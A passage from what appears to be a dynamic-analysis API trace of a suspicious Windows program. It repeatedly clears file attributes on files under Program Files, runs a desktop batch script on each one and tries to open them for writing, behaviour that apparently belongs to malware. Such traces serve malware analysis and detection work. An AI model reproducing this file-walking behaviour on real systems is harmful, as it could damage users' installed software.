lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", lpFilePart=0x36df648*="Month_Calendar.jtp") returned 0x3d [0194.130] GetLastError () returned 0x5 [0194.130] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0194.130] LocalFree (hMem=0x69e2b0) returned 0x0 [0194.130] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0194.130] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0194.131] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0194.131] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0194.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\told.exe", dwFileAttributes=0x80) returned 1 [0194.797] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\told.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\told.exe\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x494, dwThreadId=0xa04)) returned 1 [0194.826] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0200.240] CloseHandle (hObject=0x208) returned 1 [0200.240] CloseHandle (hObject=0x1e8) returned 1 [0200.240] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\told.exe" (normalized: "c:\\program files\\windows mail\\told.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.241] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\told.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Mail\\told.exe", lpFilePart=0x36df648*="told.exe") returned 0x26 [0200.241] GetLastError () returned 0x20 [0200.241] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="?iͭ폈Hͭ퐔Hͭ") returned 0x51 [0200.241] LocalFree (hMem=0x69df18) returned 0x0 [0200.241] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0200.241] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0200.242] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0200.242] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0200.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe", dwFileAttributes=0x80) returned 1 [0200.243] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x7d8, dwThreadId=0xa94)) returned 1 [0200.351] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0206.028] CloseHandle (hObject=0x208) returned 1 [0206.028] CloseHandle (hObject=0x1e8) returned 1 [0206.028] CreateFileW (lpFileName="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe" (normalized: "c:\\program files\\windows portable devices\\mxslipstream.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0206.028] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe", lpFilePart=0x36df648*="mxslipstream.exe") returned 0x3a [0206.028] GetLastError () returned 0x20 [0206.028] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="hͭ폈Hͭ퐔Hͭ") returned 0x51 [0206.029] LocalFree (hMem=0x68e418) returned 0x0 [0206.029] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0206.029] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0206.029] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0206.029] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0206.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", dwFileAttributes=0x80) returned 0 [0206.030] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0xab8, dwThreadId=0xa38)) returned 1 [0206.371] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0212.347] CloseHandle (hObject=0x208) returned 1 [0212.348] CloseHandle (hObject=0x1e8) returned 1 [0212.348] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jnwmon.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0212.348] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", lpFilePart=0x36df648*="jnwmon.dll.mui") returned 0x35 [0212.348] GetLastError () returned 0x5 [0212.348] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0212.349] LocalFree (hMem=0x69e2b0) returned 0x0 [0212.349] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0212.349] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0212.349] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0212.349] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0212.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", dwFileAttributes=0x80) returned 0 [0212.350] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0xad4, dwThreadId=0xb4c)) returned 1 [0213.116] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0218.855] CloseHandle (hObject=0x208) returned 1 [0218.855] CloseHandle (hObject=0x1e8) returned 1 [0218.855] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp" (normalized: "c:\\program files\\windows journal\\templates\\dotted_line.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0218.856] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", lpFilePart=0x36df648*="Dotted_Line.jtp") returned 0x3a [0218.856] GetLastError () returned 0x5 [0218.856] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0218.856] LocalFree (hMem=0x69e2b0) returned 0x0 [0218.856] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0218.856] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0218.857] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0218.857] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0218.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", dwFileAttributes=0x80) returned 0 [0218.858] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x540, dwThreadId=0x24c)) returned 1 [0219.022] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0225.205] CloseHandle (hObject=0x208) returned 1 [0225.205] CloseHandle (hObject=0x1e8) returned 1 [0225.205] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp" (normalized: "c:\\program files\\windows journal\\templates\\shorthand.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0225.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", lpFilePart=0x36df648*="Shorthand.jtp") returned 0x38 [0225.206] GetLastError () returned 0x5 [0225.206] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0225.206] LocalFree (hMem=0x69e2b0) returned 0x0 [0225.206] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0225.206] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0225.207] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0225.207] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0225.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\WinMail.exe", dwFileAttributes=0x80) returned 1 [0225.208] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\WinMail.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\WinMail.exe\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x7c4, dwThreadId=0xa8c)) returned 1 [0225.614] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0232.186] CloseHandle (hObject=0x208) returned 1 [0232.186] CloseHandle (hObject=0x1e8) returned 1 [0232.186] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files\\windows mail\\winmail.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.186] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\WinMail.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Mail\\WinMail.exe", lpFilePart=0x36df648*="WinMail.exe") returned 0x29 [0232.186] GetLastError () returned 0x5 [0232.186] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0232.186] LocalFree (hMem=0x69e2b0) returned 0x0 [0232.186] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0232.186] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0232.187] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0232.187] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0232.187] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\accupos.exe", dwFileAttributes=0x80) returned 1 [0232.188] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0xad0, dwThreadId=0xae4)) returned 1 [0232.616] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0239.723] CloseHandle (hObject=0x208) returned 1 [0239.723] CloseHandle (hObject=0x1e8) returned 1 [0239.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\accupos.exe" (normalized: "c:\\program files (x86)\\adobe\\accupos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.724] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\accupos.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpFilePart=0x36df648*="accupos.exe") returned 0x28 [0239.724] GetLastError () returned 0x20 [0239.724] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iͭ폈Hͭ퐔Hͭ") returned 0x51 [0239.724] LocalFree (hMem=0x696c00) returned 0x0 [0239.724] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0239.724] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0239.724] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0239.725] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0239.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", dwFileAttributes=0x80) returned 0 [0239.725] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x1c4, dwThreadId=0xb54)) returned 1 [0239.761] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0245.152] CloseHandle (hObject=0x208) returned 1 [0245.152] CloseHandle (hObject=0x1e8) returned 1 [0245.152] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui" (normalized: "c:\\program files\\windows journal\\en-us\\mspvwctl.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", lpFilePart=0x36df648*="MSPVWCTL.DLL.mui") returned 0x37 [0245.152] GetLastError () returned 0x5 [0245.152] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0245.152] LocalFree (hMem=0x69e2b0) returned 0x0 [0245.152] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0245.152] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0245.152] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0245.153] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0245.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui", dwFileAttributes=0x80) returned 0 [0245.153] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x6a0, dwThreadId=0x598)) returned 1 [0245.165] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0258.310] CloseHandle (hObject=0x208) returned 1 [0258.310] CloseHandle (hObject=0x1e8) returned 1 [0258.310] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui" (normalized: "c:\\program files\\windows journal\\en-us\\journal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0258.311] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui", lpFilePart=0x36df648*="Journal.exe.mui") returned 0x36 [0258.311] GetLastError () returned 0x5 [0258.311] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0258.311] LocalFree (hMem=0x69e2b0) returned 0x0 [0258.311] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0258.311] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0258.311] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0258.312] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0258.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui", dwFileAttributes=0x80) returned 0 [0258.312] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 